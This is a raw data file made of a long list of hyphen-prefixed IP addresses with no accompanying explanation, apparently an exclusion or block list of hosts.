-139.162.21.32 -54.241.0.148 -164.52.150.228 -203.86.26.195 -23.244.190.194 -120.27.118.1 -138.201.88.36 -173.255.235.188 -91.121.35.18 -109.73.168.224 -162.247.232.88 -119.29.19.57 -217.182.75.184 -172.247.51.133 -23.224.115.124 -106.2.20.116 -103.210.239.11 -45.63.66.47 -183.26.171.233 -103.99.62.141 -104.239.194.99 -52.237.76.102 -115.28.16.169 -115.159.24.129 -213.210.193.149 -110.36.218.66 -69.30.223.74 -54.145.150.166 -172.104.169.92 -158.69.39.169 -106.187.92.214 -84.204.252.11 -94.23.222.151 -202.55.73.13 -82.135.151.74 -120.76.154.6 -164.58.48.3 -78.11.246.99 -125.212.252.157 -182.74.237.134 -58.81.20.3 -123.30.110.247 -23.88.82.192 -104.37.212.68 -121.199.4.178 -219.159.239.42 -123.207.239.115 -142.91.95.169 -139.165.3.163 -23.225.113.10 -120.24.189.180 -54.199.221.114 -139.162.43.247 -23.224.242.18 -182.48.58.118 -82.135.151.221 -113.200.58.4 -23.244.190.175 -139.129.20.60 -119.29.5.150 -172.246.101.96 -69.50.196.245 -202.91.244.102 -104.224.202.168 -69.64.57.39 -121.199.37.92 -139.129.164.80 -103.20.144.6 -167.250.28.25 -106.75.16.156 -41.185.27.108 -52.6.132.175 -89.239.122.17 -115.29.29.208 -47.93.35.182 -120.27.135.19 -123.31.20.137 -65.18.120.18 -118.97.211.58 -23.104.135.196 -185.174.29.203 -160.16.68.248 -184.175.99.43 -37.210.228.155 -216.131.75.13 -43.225.157.197 -112.126.81.153 -23.244.241.81 -192.99.47.169 -139.199.16.181 -200.250.20.163 -72.1.245.18 -120.55.88.176 -51.254.5.211 -202.153.178.200 -47.98.53.90 -60.164.129.185 -82.135.151.143 -112.124.61.178 -79.137.33.75 -116.53.214.210 -220.126.66.77 -132.148.142.160 -194.218.22.97 -80.241.245.102 -175.168.135.144 -91.227.17.19 -216.55.141.205 -183.60.200.134 -61.172.255.13 -95.211.185.246 -117.27.251.108 -172.247.51.161 -188.121.63.140 -153.122.73.117 -39.109.123.41 -216.131.81.123 -178.32.246.98 -72.52.126.147 -87.98.245.162 -119.254.162.74 -172.247.51.157 -59.110.49.123 -78.24.219.213 -43.251.208.16 -139.199.181.66 -219.155.13.118 -184.95.53.27 -120.77.98.249 -139.196.11.82 -120.27.25.204 -167.114.54.81 -65.175.106.142 -52.200.85.114 -125.221.35.56 -72.1.245.112 -151.80.133.150 -218.4.101.7 -120.77.10.230 -112.74.192.51 -221.192.142.22 -104.238.92.178 -104.130.194.221 -120.27.211.119 -103.195.239.111 -23.225.89.17 -110.232.142.215 -182.18.63.112 -117.120.49.221 -185.105.187.209 -172.246.101.17 -185.2.43.107 -61.160.210.194 -106.15.42.245 -23.88.82.166 -162.212.180.104 -14.118.149.235 -103.254.107.5 -121.40.135.114 -45.116.137.193 -195.20.15.52 -108.61.250.238 -104.167.69.34 -104.130.136.140 -216.131.119.110 -198.50.191.108 -61.186.137.161 -52.37.252.198 -185.80.51.179 -114.141.189.247 -61.111.21.163 -150.187.143.26 -220.250.52.218 -54.249.81.229 -107.167.183.72 -120.76.78.197 -185.73.38.120 -23.104.135.157 -173.254.192.50 -199.34.120.233 -212.26.136.164 -93.174.163.187 -106.14.65.44 -23.88.82.18 -119.23.57.195 -120.26.120.145 -43.229.155.234 -74.86.126.224 -123.56.203.215 -195.2.252.235 -208.38.172.52 -108.61.157.136 -146.88.76.51 -167.205.108.185 -123.30.238.208 -188.116.12.141 -115.29.174.26 -79.174.47.25 -213.136.81.113 -59.110.212.237 -186.46.162.236 -67.23.44.90 -216.131.64.171 -153.122.10.89 -108.170.59.215 -112.80.5.189 -216.131.89.246 -202.153.178.195 -111.203.233.10 -133.242.181.212 -210.5.42.47 -114.55.140.92 -142.91.95.185 -202.234.44.99 -123.206.19.208 -172.104.169.14 -39.108.56.91 -45.114.117.18 -163.24.235.234 -120.26.217.64 -190.114.210.170 -51.15.208.174 -188.132.147.3 -47.97.181.29 -203.137.39.76 -217.112.131.167 -218.207.2.101 -54.199.130.243 -203.89.28.178 -45.76.178.102 -200.145.102.81 -62.109.1.69 -164.153.248.138 -109.104.88.205 -23.235.234.14 -103.234.38.39 -167.205.12.75 -121.197.1.149 -123.56.152.167 -87.245.178.230 -139.224.68.87 -81.169.139.188 -218.93.208.14 -119.28.47.95 -167.114.192.172 -104.130.24.177 -139.196.179.84 -61.91.14.126 -216.131.68.115 -123.30.128.182 -162.247.99.150 -65.60.9.133 -104.237.63.141 -117.159.19.11 -216.131.114.188 -142.91.95.205 -45.32.193.201 -47.104.102.114 -114.215.64.228 -173.212.209.171 -120.25.91.58 -142.44.138.86 -123.207.93.233 -184.154.216.39 -142.4.107.83 -45.114.94.183 -107.180.85.7 -23.225.89.54 -121.201.60.181 -123.31.38.85 -54.38.120.208 -178.18.141.241 -69.175.101.147 -119.29.105.110 -121.41.230.19 -103.205.82.29 -191.96.112.16 -96.44.141.165 -219.238.5.182 -54.65.32.245 -203.110.85.75 -31.220.53.109 -5.196.154.144 -176.100.100.206 -5.196.246.196 -51.255.204.187 -46.29.18.167 -192.80.147.86 -46.161.8.60 -95.76.255.203 -172.246.101.72 -198.57.185.164 -120.77.22.161 -101.200.239.121 -88.212.204.54 -82.135.151.166 -119.59.101.110 -139.224.0.83 -64.19.96.140 -91.194.250.248 -198.89.127.103 -106.15.49.195 -218.1.65.46 -219.217.90.160 -118.31.37.175 -80.74.69.91 -190.121.142.141 -45.114.94.69 -81.20.194.68 -222.89.81.99 -139.196.32.250 -116.62.19.176 -120.27.120.104 -37.228.68.43 -222.87.49.115 -112.74.28.4 -157.7.221.22 -200.27.220.195 -192.99.93.189 -45.114.94.76 -222.255.128.113 -45.114.94.226 -185.66.141.224 -221.7.139.238 -123.31.47.23 -104.238.140.186 -81.171.1.140 -103.56.205.230 -103.219.204.34 -123.127.213.28 -87.237.117.77 -86.62.91.164 -115.29.248.163 -23.244.241.151 -115.29.202.223 -34.217.72.82 -139.162.185.45 -89.32.226.140 -210.245.18.133 -185.8.173.157 -203.162.166.42 -107.191.50.52 -101.69.129.58 -34.200.93.223 -47.95.222.104 -104.194.233.38 -68.169.52.12 -45.40.132.212 -166.63.5.200 -176.31.16.40 -23.225.113.236 -142.91.95.173 -104.207.52.94 -121.54.161.96 -218.93.198.58 -185.142.212.151 -41.185.22.60 -91.237.99.149 -162.247.235.75 -98.142.106.27 -92.43.114.244 -104.203.82.209 -112.213.84.97 -198.65.151.226 -35.201.237.237 -162.247.234.84 -198.101.251.10 -166.62.74.196 -217.182.136.106 -47.92.78.88 -201.147.91.36 -192.232.215.237 -112.74.200.84 -158.69.19.195 -92.43.114.245 -201.49.21.250 -14.23.151.195 -23.224.115.201 -54.149.152.39 -116.31.100.232 -195.96.231.116 -192.155.229.154 -173.209.44.12 -103.15.51.75 -124.172.250.35 -153.122.30.28 -112.74.85.179 -91.215.218.2 -23.88.82.233 -93.183.194.197 -47.90.33.152 -64.118.87.201 -115.28.208.139 -176.221.41.116 -133.130.74.163 -93.42.140.93 -172.104.108.138 -49.212.31.215 -104.194.233.37 -120.76.22.107 -113.161.98.113 -216.119.145.246 -23.225.89.175 -114.111.159.176 -45.61.114.2 -208.115.124.19 -142.91.95.140 -120.77.48.57 -45.252.250.177 -121.40.182.47 -120.24.181.96 -65.60.43.174 -75.126.140.226 -121.40.138.96 -45.76.181.30 -169.48.181.213 -23.224.115.18 -210.34.0.222 -173.249.12.36 -172.247.51.30 -82.135.151.134 -180.153.69.162 -132.148.26.8 -82.135.151.87 -185.174.30.221 -27.96.16.161 -23.224.115.46 -178.32.190.82 -172.104.48.222 -91.237.109.43 -31.186.25.55 -120.24.56.251 -112.74.205.57 -54.82.90.87 -65.18.113.62 -95.158.131.139 -45.125.239.168 -64.120.123.239 -125.206.126.48 -149.202.73.129 -82.113.49.43 -54.83.74.52 -123.56.43.69 -95.213.162.4 -162.246.99.66 -185.66.69.23 -123.57.59.135 -185.174.28.136 -188.132.147.15 -123.56.162.100 -45.114.94.58 -82.146.38.210 -45.33.26.223 -108.61.28.213 -116.255.222.144 -91.121.221.50 -123.56.67.177 -118.112.97.243 -182.140.221.115 -210.14.72.34 -109.73.168.195 -52.42.176.109 -179.185.54.237 -153.122.66.145 -58.117.175.243 -54.173.171.221 -72.1.245.59 -59.106.215.27 -101.201.223.138 -47.95.239.188 -61.135.227.121 -202.74.238.121 -121.40.115.198 -112.74.104.214 -87.98.165.60 -123.57.173.135 -115.28.105.186 -208.115.124.18 -89.107.129.102 -77.223.134.204 -120.76.217.98 -119.81.11.37 -107.155.74.72 -45.114.94.96 -121.43.171.245 -115.29.223.220 -37.59.191.50 -187.18.184.90 -192.80.147.246 -5.199.133.64 -178.238.224.151 -121.42.238.179 -190.15.194.50 -80.77.52.180 -45.32.46.209 -104.223.56.251 -72.1.245.98 -142.91.95.241 -54.185.52.74 -182.92.110.138 -198.200.41.20 -5.135.224.48 -74.200.203.251 -45.79.184.204 -202.59.250.159 -94.102.8.69 -115.28.155.51 -5.196.108.132 -47.92.154.103 -123.56.137.39 -103.216.216.91 -103.200.23.185 -188.165.26.90 -119.28.53.213 -23.244.190.239 -174.127.112.15 -45.119.81.4 -176.223.197.34 -209.126.122.63 -120.25.161.67 -121.40.126.251 -201.184.226.42 -23.104.135.183 -23.225.239.103 -192.163.198.141 -109.169.76.72 -203.189.120.210 -120.25.62.95 -23.244.190.8 -67.199.15.211 -95.163.100.6 -104.207.44.120 -94.138.214.195 -158.69.19.198 -188.165.2.52 -1.207.22.231 -118.31.76.146 -222.124.22.67 -192.99.24.25 -123.57.135.11 -190.14.37.138 -199.245.214.175 -223.202.202.17 -123.150.244.40 -37.187.137.27 -151.80.10.99 -104.203.82.88 -58.30.134.46 -109.169.86.238 -200.110.173.173 -184.154.181.198 -202.47.95.213 -103.27.239.211 -96.126.112.235 -36.250.6.179 -115.159.38.63 -37.220.12.242 -115.182.69.234 -37.187.205.112 -217.112.131.172 -43.246.216.225 -111.125.66.12 -160.16.66.182 -88.85.91.4 -185.208.174.197 -23.244.241.221 -120.27.235.107 -23.244.190.98 -109.201.149.183 -118.89.224.249 -106.120.214.174 -23.225.113.184 -202.10.78.114 -112.16.150.194 -192.232.237.88 -120.76.223.65 -99.198.111.118 -112.74.182.48 -64.137.255.218 -101.251.254.44 -41.93.50.22 -45.32.8.7 -211.159.152.117 -182.92.101.85 -118.184.0.182 -104.203.82.3 -116.55.13.113 -23.225.113.233 -182.16.172.205 -5.39.44.42 -175.146.7.231 -1.195.120.154 -119.29.243.184 -172.246.101.38 -119.28.76.210 -51.255.140.22 -104.207.149.184 -170.75.251.10 -120.27.163.51 -107.180.78.166 -114.215.67.203 -198.11.178.237 -115.159.193.137 -104.224.201.245 -119.29.13.92 -118.190.40.155 -120.32.242.124 -197.242.148.9 -67.222.143.103 -59.160.153.187 -104.215.193.89 -139.129.10.127 -213.172.5.100 -23.88.82.210 -222.165.221.234 -84.22.107.2 -13.112.127.45 -185.174.30.158 -23.88.82.8 -198.100.144.164 -112.74.168.18 -115.28.79.127 -94.176.238.192 -87.246.139.114 -153.139.233.179 -89.145.86.59 -177.69.103.163 -123.57.253.43 -133.242.201.33 -104.203.82.107 -121.40.203.229 -120.27.22.75 -185.106.23.16 -83.238.15.30 -45.56.73.152 -94.136.45.88 -166.62.101.38 -192.99.87.228 -120.24.4.82 -89.30.140.163 -61.247.183.185 -104.207.40.142 -45.76.179.195 -52.8.45.114 -177.36.2.101 -114.251.70.54 -160.16.216.145 -123.57.234.92 -23.253.102.188 -192.99.63.229 -23.225.239.12 -8.12.176.19 -212.252.213.252 -38.101.34.22 -151.236.32.58 -172.110.7.91 -79.106.102.34 -192.96.206.180 -176.58.115.82 -37.187.70.183 -121.41.9.63 -96.44.140.59 -37.123.99.16 -173.212.197.123 -45.76.190.240 -118.184.37.137 -209.95.39.207 -115.238.145.147 -66.39.23.167 -166.63.21.1 -34.204.81.24 -104.207.40.138 -193.205.222.6 -117.102.106.179 -114.215.185.237 -101.200.241.71 -23.225.239.122 -82.98.166.29 -194.158.210.235 -188.120.248.171 -163.5.69.235 -166.62.35.237 -52.192.140.145 -94.23.171.107 -45.76.188.239 -31.31.202.75 -119.29.242.183 -101.37.79.21 -145.239.139.199 -112.90.91.152 -82.135.151.163 -122.129.217.16 -107.165.13.54 -5.160.219.11 -45.61.113.38 -23.224.245.31 -212.84.163.86 -172.104.235.158 -52.193.59.216 -64.120.123.142 -50.22.198.221 -54.158.76.217 -97.74.237.57 -103.15.50.9 -94.236.95.2 -101.201.122.92 -185.126.176.130 -123.57.164.203 -115.29.102.175 -108.168.234.58 -64.118.87.202 -121.40.100.131 -107.190.235.77 -123.57.238.197 -82.146.41.200 -54.197.201.207 -157.7.223.93 -185.174.28.120 -115.182.102.45 -209.142.64.52 -37.59.81.69 -103.80.238.211 -122.228.132.25 -202.107.194.82 -50.63.59.99 -91.227.16.122 -45.32.161.148 -121.40.20.155 -178.161.138.18 -121.42.26.0 -198.56.238.30 -69.162.84.118 -5.135.174.113 -45.61.115.35 -106.250.170.202 -176.119.36.229 -120.24.177.194 -5.160.219.13 -37.61.236.183 -173.249.158.25 -120.76.55.160 -176.104.2.12 -192.190.225.139 -115.29.246.206 -45.63.16.234 -52.4.75.53 -64.118.95.125 -211.103.199.116 -64.237.40.69 -125.69.73.247 -52.80.21.158 -182.254.208.48 -208.117.38.222 -140.143.85.141 -158.69.101.84 -34.227.76.255 -149.71.102.200 -151.80.181.232 -45.252.250.207 -114.160.220.111 -5.45.108.142 -47.89.20.175 -91.121.79.51 -173.255.220.10 -203.129.195.204 -45.32.114.164 -153.127.198.42 -192.80.147.138 -120.26.115.183 -45.32.95.137 -109.73.168.217 -117.70.74.191 -115.28.7.159 -121.41.52.248 -185.70.96.13 -111.89.176.228 -91.225.130.182 -23.104.135.5 -120.24.154.50 -64.20.35.138 -45.32.148.198 -115.29.251.172 -185.174.29.215 -103.105.58.65 -121.40.34.99 -92.43.114.246 -52.86.133.209 -64.140.158.241 -91.233.139.182 -103.195.100.29 -192.169.153.255 -192.155.224.185 -123.57.220.160 -45.117.170.16 -173.243.113.165 -61.165.12.133 -149.56.130.72 -198.49.67.213 -35.178.43.43 -34.243.138.75 -95.213.136.101 -43.230.200.83 -142.91.95.254 -212.68.42.8 -5.189.160.63 -120.26.111.4 -120.76.73.234 -61.241.194.250 -39.106.49.39 -92.53.106.165 -66.154.119.185 -108.163.140.81 -173.249.1.221 -91.109.244.22 -118.178.95.114 -104.207.148.176 -176.62.193.121 -104.207.40.162 -103.10.157.27 -218.244.159.189 -184.106.197.58 -180.250.84.194 -23.88.82.254 -96.44.179.250 -185.95.212.85 -23.104.135.111 -172.247.51.17 -202.181.24.197 -174.142.214.240 -47.88.15.205 -54.173.197.157 -218.251.227.144 -5.189.188.241 -121.40.202.121 -23.244.241.193 -174.36.216.189 -23.225.89.230 -120.26.96.227 -209.235.220.241 -64.140.157.43 -203.152.217.46 -65.60.59.117 -213.154.70.108 -87.98.250.102 -45.63.16.75 -139.162.35.30 -185.52.231.249 -172.110.20.202 -74.122.77.85 -209.123.65.105 -176.20.235.138 -103.244.123.112 -47.92.99.44 -104.207.44.124 -66.70.222.51 -64.118.87.204 -111.230.137.227 -13.230.23.34 -151.80.81.165 -23.225.239.166 -52.6.99.12 -115.29.43.107 -194.44.37.165 -13.59.13.163 -139.196.252.157 -187.190.243.20 -151.80.169.150 -115.29.160.86 -120.78.93.19 -103.230.121.228 -45.63.61.3 -119.28.73.98 -142.4.119.65 -50.207.43.109 -69.13.210.193 -82.135.151.235 -178.32.120.237 -218.31.146.106 -140.143.152.248 -185.174.30.220 -184.171.240.163 -185.37.228.21 -160.16.52.165 -45.33.66.238 -45.76.152.229 -207.99.46.155 -223.199.217.120 -52.205.197.132 -202.47.112.28 -199.101.98.243 -103.200.5.207 -185.174.31.236 -164.132.29.35 -120.76.192.13 -120.76.129.19 -66.254.175.42 -123.57.82.148 -216.250.125.72 -31.146.177.58 -172.247.51.129 -203.115.96.50 -198.27.126.33 -120.26.236.28 -89.33.247.139 -145.239.98.216 -74.117.154.194 -5.254.88.189 -112.124.39.164 -103.71.236.88 -88.150.157.241 -45.61.112.52 -149.56.240.70 -64.64.12.49 -72.9.152.136 -157.7.248.101 -23.225.239.49 -82.135.151.9 -23.224.243.57 -107.191.55.87 -182.254.136.59 -45.61.112.21 -81.22.110.209 -35.202.98.36 -178.33.236.211 -64.15.150.159 -200.98.129.30 -182.61.44.42 -185.174.30.216 -109.207.96.42 -91.121.60.78 -64.118.92.58 -181.174.189.55 -31.220.58.243 -217.147.91.165 -45.32.46.17 -218.17.151.59 -51.254.27.122 -23.244.190.244 -162.247.234.87 -47.94.47.31 -212.22.77.93 -47.92.157.110 -163.43.83.6 -141.0.17.153 -218.244.143.70 -172.247.51.158 -65.60.5.104 -27.120.111.36 -95.213.196.25 -173.214.170.131 -82.135.151.182 -144.217.255.199 -119.29.69.115 -192.169.203.2 -89.43.200.65 -115.28.42.119 -41.185.21.146 -14.102.150.60 -212.47.245.106 -178.33.252.11 -198.23.65.86 -52.198.115.29 -222.172.225.212 -109.201.149.187 -112.213.84.87 -23.225.239.128 -185.174.29.226 -91.199.106.104 -94.237.41.68 -54.88.11.110 -23.88.82.197 -119.29.107.130 -139.199.154.83 -187.63.160.74 -172.246.101.53 -121.14.31.13 -185.93.52.27 -142.91.95.67 -155.254.18.253 -207.254.52.183 -104.224.205.105 -173.212.224.59 -172.246.248.123 -130.237.79.32 -62.213.100.22 -112.78.10.199 -204.14.31.156 -23.224.40.188 -46.44.195.12 -166.62.82.76 -122.225.96.122 -123.207.247.230 -34.195.208.90 -118.184.57.139 -180.250.170.34 -112.74.40.255 -5.152.209.94 -142.91.95.172 -103.238.224.39 -50.115.116.233 -70.36.125.56 -82.135.148.136 -125.253.127.2 -54.36.90.9 -89.33.247.24 -198.200.41.8 -139.129.207.34 -86.104.177.29 -121.42.170.192 -142.4.103.75 -13.126.185.168 -103.22.180.169 -89.163.130.136 -192.99.226.82 -150.129.42.136 -89.33.44.12 -101.251.215.220 -202.191.223.140 -43.230.201.161 -199.102.44.91 -47.90.73.212 -144.217.94.113 -115.29.47.192 -54.211.208.94 -193.30.230.250 -108.61.187.125 -125.46.44.2 -86.104.177.42 -45.76.151.131 -133.242.11.84 -94.56.144.206 -52.57.110.93 -172.246.101.30 -210.71.245.26 -157.7.128.175 -119.9.108.89 -119.23.151.200 -82.223.34.114 -120.77.8.165 -192.36.179.199 -104.238.92.238 -46.166.187.106 -123.59.139.220 -95.67.17.28 -54.38.143.21 -64.59.92.3 -120.79.191.184 -123.207.91.248 -77.75.124.167 -184.154.216.37 -120.24.161.213 -194.244.57.4 -103.52.71.70 -54.197.166.154 -103.74.117.19 -209.68.59.3 -185.174.31.230 -54.37.142.62 -142.4.103.77 -212.68.42.165 -125.209.112.4 -62.76.187.14 -67.220.184.102 -217.147.91.106 -23.253.99.20 -144.217.6.44 -204.44.104.191 -122.114.91.126 -62.12.115.33 -124.205.7.45 -96.30.8.72 -220.226.190.150 -173.236.115.110 -115.159.95.204 -101.201.220.227 -119.23.206.85 -182.160.161.154 -188.132.179.148 -23.88.82.201 -43.252.156.4 -101.201.39.1 -82.135.148.154 -52.69.189.235 -203.78.160.22 -119.82.225.171 -14.42.41.158 -162.13.89.144 -202.148.12.244 -198.56.192.92 -117.78.40.253 -121.52.217.144 -91.121.221.32 -109.235.71.168 -45.76.154.222 -203.195.194.142 -45.252.249.123 -119.23.79.155 -120.76.163.208 -5.39.64.48 -94.237.35.12 -222.187.226.230 -185.93.68.101 -104.224.201.246 -82.98.164.80 -47.52.45.95 -74.208.13.17 -199.193.153.119 -89.33.247.10 -104.129.61.42 -211.90.22.196 -23.104.135.16 -51.15.213.239 -142.44.201.218 -139.199.173.35 -122.235.213.176 -160.19.212.183 -139.199.153.149 -178.32.109.178 -46.105.102.46 -116.236.231.198 -185.66.55.54 -122.114.197.129 -62.138.0.97 -66.254.178.22 -93.115.243.11 -118.190.45.155 -34.227.199.80 -61.14.235.120 -121.40.54.31 -23.224.242.39 -45.76.156.200 -122.92.167.13 -43.228.245.25 -23.225.89.231 -94.136.38.197 -162.216.19.138 -69.175.42.172 -34.229.218.219 -182.92.183.211 -216.92.204.253 -107.180.84.235 -35.195.122.231 -138.201.176.226 -52.78.122.73 -103.30.149.141 -193.19.211.221 -82.135.151.156 -45.76.218.32 -202.231.20.38 -117.120.6.220 -93.188.161.37 -119.205.235.78 -60.216.116.66 -132.148.64.251 -159.122.208.133 -54.237.199.211 -193.224.129.250 -106.120.100.78 -144.168.72.139 -106.185.48.69 -47.96.135.135 -120.25.213.27 -23.92.17.31 -185.174.29.207 -192.80.147.84 -72.1.245.27 -91.123.196.124 -209.58.177.35 -66.70.184.160 -162.209.215.163 -115.29.113.167 -120.26.84.106 -23.224.244.28 -43.226.64.142 -120.25.12.169 -157.7.249.48 -52.12.57.93 -198.24.170.60 -185.22.233.178 -132.148.1.222 -37.230.114.195 -120.25.64.36 -139.129.98.116 -153.122.33.172 -64.120.123.147 -47.75.59.191 -96.30.47.163 -104.238.82.233 -103.29.84.151 -210.5.43.45 -185.63.189.185 -186.226.56.14 -158.69.163.124 -178.211.51.243 -185.29.122.101 -109.72.149.187 -123.57.89.0 -45.79.130.223 -190.152.213.91 -54.92.61.107 -139.129.231.40 -23.88.141.28 -121.42.181.182 -83.220.169.200 -31.134.123.115 -164.132.54.131 -166.62.42.163 -46.38.190.76 -23.244.241.242 -123.57.62.81 -206.190.153.78 -92.63.86.148 -202.90.159.248 -109.235.252.141 -69.64.41.237 -139.199.19.218 -187.157.242.114 -222.134.192.118 -39.108.126.195 -35.158.34.83 -115.236.59.226 -222.85.139.44 -62.109.3.245 -185.33.104.117 -111.47.65.162 -52.74.66.51 -125.212.243.206 -39.108.5.44 -61.166.10.170 -23.225.89.143 -192.99.147.134 -142.4.103.113 -23.244.241.120 -54.194.121.46 -54.36.88.156 -120.236.158.216 -103.45.59.38 -23.244.241.184 -192.80.147.108 -14.223.27.71 -46.32.228.173 -139.129.5.147 -122.194.107.151 -160.153.113.66 -216.25.83.234 -103.16.128.94 -47.92.64.116 -54.164.115.252 -203.189.97.214 -198.200.41.15 -186.24.35.68 -112.74.76.38 -200.4.208.130 -84.38.227.11 -192.162.84.246 -167.114.238.253 -123.56.182.49 -39.109.11.231 -69.30.202.67 -166.62.56.174 -78.108.91.202 -74.117.156.11 -104.224.201.247 -89.248.171.145 -216.158.235.11 -172.110.6.122 -72.1.245.3 -88.156.77.167 -115.238.252.169 -103.42.178.126 -46.166.134.223 -201.200.31.178 -45.76.189.7 -206.217.216.83 -138.201.203.153 -120.26.55.139 -103.90.228.111 -69.50.195.53 -43.225.157.27 -103.40.116.216 -23.224.245.32 -142.91.95.69 -185.174.31.233 -104.203.82.108 -123.57.62.75 -104.203.82.38 -35.201.172.15 -77.55.230.167 -185.140.120.93 -140.143.192.26 -180.131.41.175 -188.116.12.149 -179.43.134.226 -119.23.37.17 -64.140.157.88 -139.99.117.50 -45.77.168.44 -181.211.56.115 -119.29.27.183 -153.127.203.92 -54.72.37.150 -120.76.42.94 -167.114.48.57 -96.44.169.218 -50.62.133.243 -54.244.245.18 -82.146.63.240 -199.223.253.76 -219.83.160.137 -93.174.163.190 -23.224.115.183 -155.94.130.121 -111.230.152.145 -164.115.5.129 -172.247.51.200 -200.74.240.40 -103.27.177.235 -51.255.110.120 -103.19.37.163 -210.245.88.172 -23.244.241.79 -183.17.225.108 -5.160.219.61 -23.224.244.33 -153.127.199.34 -23.224.245.60 -202.91.236.39 -5.196.85.159 -75.103.109.195 -116.211.121.53 -116.211.121.53 -89.33.26.10 -114.215.241.83 -104.154.187.71 -43.225.157.63 -42.112.26.23 -119.23.115.8 -52.68.33.212 -149.56.80.211 -76.164.201.194 -23.224.245.44 -176.28.115.185 -147.135.129.178 -23.88.82.106 -173.203.88.199 -52.32.165.119 -192.254.199.86 -59.36.77.5 -172.246.101.121 -123.157.148.186 -151.80.213.177 -167.114.163.245 -96.126.127.98 -190.152.22.195 -123.56.149.208 -94.231.188.137 -203.201.164.82 -52.33.103.27 -112.78.186.244 -162.242.220.45 -120.76.193.124 -45.122.222.110 -47.92.119.23 -123.207.244.52 -54.95.38.245 -106.14.81.124 -49.74.0.46 -219.72.250.246 -172.104.101.95 -101.200.142.251 -198.200.41.14 -45.76.9.214 -5.189.132.68 -124.232.153.225 -139.224.12.239 -72.1.245.97 -188.120.247.252 -169.54.217.85 -87.120.36.206 -185.114.192.43 -142.91.95.193 -101.37.86.116 -95.51.230.74 -108.59.253.45 -173.236.111.174 -150.95.135.51 -198.200.41.11 -115.28.226.132 -173.255.227.156 -95.141.115.89 -132.148.21.104 -209.188.7.165 -120.24.93.152 -101.69.110.202 -185.124.84.171 -172.246.248.121 -47.52.5.225 -166.63.21.48 -14.29.35.19 -103.105.77.5 -23.244.190.141 -125.253.127.249 -192.155.85.109 -139.224.207.29 -31.3.173.88 -41.138.51.108 -185.127.21.11 -120.79.13.206 -198.100.158.101 -173.212.196.184 -174.137.49.28 -23.224.245.56 -82.194.90.103 -75.103.111.31 -119.33.31.18 -192.169.142.89 -123.56.117.108 -199.245.54.200 -47.90.55.162 -115.28.222.153 -210.211.127.173 -182.92.158.175 -195.54.206.245 -104.207.50.83 -112.124.113.138 -120.25.244.98 -82.98.166.28 -18.195.136.31 -104.224.200.250 -121.41.18.174 -123.57.90.156 -23.234.26.152 -110.93.228.148 -166.63.21.99 -119.29.177.210 -103.41.127.120 -115.231.219.78 -120.79.193.212 -23.88.82.176 -120.24.246.196 -216.119.150.62 -103.250.199.101 -123.58.34.246 -186.47.86.6 -125.40.177.243 -125.212.253.122 -210.4.68.251 -207.245.84.195 -45.118.248.69 -202.47.95.214 -23.224.245.39 -104.250.135.20 -23.224.242.20 -54.92.45.35 -120.50.13.162 -82.135.148.249 -76.74.177.84 -75.103.109.193 -103.27.237.34 -168.235.91.75 -115.85.231.196 -94.23.160.113 -58.19.183.5 -69.147.236.204 -51.254.36.140 -172.110.30.190 -111.230.186.212 -121.42.11.86 -103.55.25.59 -120.76.43.120 -121.40.38.46 -23.225.239.196 -142.44.136.12 -2001:388:608c:8c1:250:56ff:feb5:344c -217.23.14.118 -205.251.138.123 -107.6.88.211 -83.101.129.58 -142.44.201.217 -64.118.87.206 -13.231.14.45 -151.80.26.233 -101.201.143.82 -165.225.150.187 -47.88.104.228 -119.235.255.216 -188.165.16.122 -111.93.9.85 -144.217.69.93 -23.229.227.179 -182.92.150.113 -119.29.112.36 -103.45.19.231 -180.235.70.47 -121.201.42.196 -46.163.116.149 -5.199.168.149 -112.74.124.2 -106.14.94.166 -125.253.119.169 -164.132.134.2 -103.10.98.146 -50.116.108.36 -183.230.163.224 -176.34.55.190 -182.16.57.91 -103.100.209.223 -112.124.10.179 -66.254.189.85 -23.244.241.105 -107.155.125.6 -54.178.182.175 -140.210.4.40 -154.72.192.182 -97.74.230.109 -123.30.110.173 -66.135.36.186 -45.79.68.80 -96.44.153.10 -23.224.244.8 -202.51.56.59 -82.135.151.63 -173.248.174.167 -114.255.121.10 -60.205.169.64 -83.167.242.170 -122.194.229.122 -144.168.123.7 -104.207.40.186 -167.114.228.224 -188.165.54.169 -123.56.86.143 -193.140.99.21 -153.36.232.43 -45.61.114.38 -202.129.235.245 -91.227.16.128 -45.61.112.26 -23.235.234.100 -158.69.64.162 -23.224.244.29 -39.108.166.140 -125.253.127.251 -217.174.148.42 -180.175.36.9 -23.244.190.219 -221.122.120.235 -49.50.8.105 -202.105.182.153 -104.203.82.232 -120.25.236.9 -160.114.57.3 -118.184.0.224 -103.85.98.75 -119.29.23.36 -139.199.98.175 -203.195.208.197 -149.202.18.14 -89.163.150.98 -45.79.5.179 -47.98.32.60 -122.112.234.242 -196.41.124.138 -52.77.214.98 -35.153.157.43 -4.35.164.138 -198.251.87.4 -23.224.242.48 -115.159.149.177 -202.100.85.42 -188.132.250.92 -65.60.5.96 -23.88.82.103 -4.35.164.136 -72.14.185.247 -92.63.110.152 -59.110.61.178 -123.207.243.235 -47.94.23.165 -123.56.162.136 -23.111.151.230 -104.203.82.67 -41.221.49.164 -213.136.64.139 -178.33.65.187 -45.76.189.57 -31.31.203.137 -37.221.209.85 -103.29.68.64 -61.216.145.112 -64.118.95.202 -37.59.54.61 -182.254.229.133 -160.16.77.86 -31.186.99.187 -46.19.143.94 -177.154.160.12 -45.114.94.198 -139.199.182.82 -123.207.78.180 -52.199.196.157 -94.130.117.166 -218.9.87.218 -216.131.75.14 -45.63.1.134 -178.32.50.85 -65.60.5.126 -77.92.144.5 -45.125.33.135 -66.39.141.206 -91.218.229.65 -88.198.234.174 -121.42.227.165 -45.77.104.171 -69.13.210.168 -153.127.214.74 -69.195.222.79 -138.201.38.135 -106.187.51.20 -122.160.13.102 -109.201.149.217 -58.222.239.10 -115.203.162.21 -45.61.114.28 -23.225.239.148 -167.114.33.167 -118.122.122.42 -139.196.205.48 -192.169.202.14 -138.201.248.115 -23.253.17.99 -45.125.236.187 -52.2.57.55 -183.82.103.153 -45.114.94.37 -46.153.70.131 -139.196.168.229 -77.223.141.120 -69.20.42.73 -185.42.175.65 -115.29.19.90 -190.96.47.146 -95.183.11.137 -23.225.113.228 -185.174.29.165 -162.144.77.254 -46.166.134.190 -201.49.100.117 -185.5.248.43 -67.210.115.55 -185.174.30.212 -40.84.58.249 -63.141.236.155 -122.114.233.115 -115.239.209.75 -185.174.30.185 -176.31.82.180 -23.225.113.71 -199.203.139.176 -101.37.151.122 -103.53.197.126 -60.206.36.30 -23.224.245.62 -178.32.28.171 